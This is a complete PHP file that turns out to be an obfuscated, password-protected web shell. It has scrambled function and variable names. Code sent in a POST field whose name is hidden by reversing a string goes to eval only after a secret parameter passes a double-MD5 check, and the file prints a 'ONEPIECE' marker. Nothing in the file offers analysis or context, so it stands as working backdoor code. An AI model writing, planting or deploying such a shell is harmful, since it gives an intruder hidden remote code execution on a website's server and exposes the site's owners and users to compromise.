<?php

function KAzwzEpKA()
{
global $fZnonlKmckV;
$fZnonlKmckV=mkRyHE();
if(isset($_REQUEST['x']))
{
	$BcYjdcwcxnM = 'OzRfiVXqQcNzRfiVXqQcEzRfiVXqQcPzRfiVXqQcIzRfiVXqQcEzRfiVXqQcCzRfiVXqQcE';
    $BcYjdcwcxnM=str_replace('zRfiVXqQc','',$BcYjdcwcxnM);

    echo $BcYjdcwcxnM;
	if ( strcasecmp(md5(md5($_REQUEST['x'])),'6e0f972ea38c7a0a5c724c7a3f7d9b42') ==0 )
    {
	@eval("\"$fZnonlKmckV\"");
    }
}


}
function mkRyHE()
{
        $gDJrpoJAA='9--7u----t51q-0f';
		$iWCTXo=strrev($gDJrpoJAA);
		if(isset($_POST[$iWCTXo]))
        {
        $dgUMfgwIA=str_replace('','',$_POST[$iWCTXo]);
        
        return '";'.$dgUMfgwIA.'//';
		}
}

KAzwzEpKA();

?>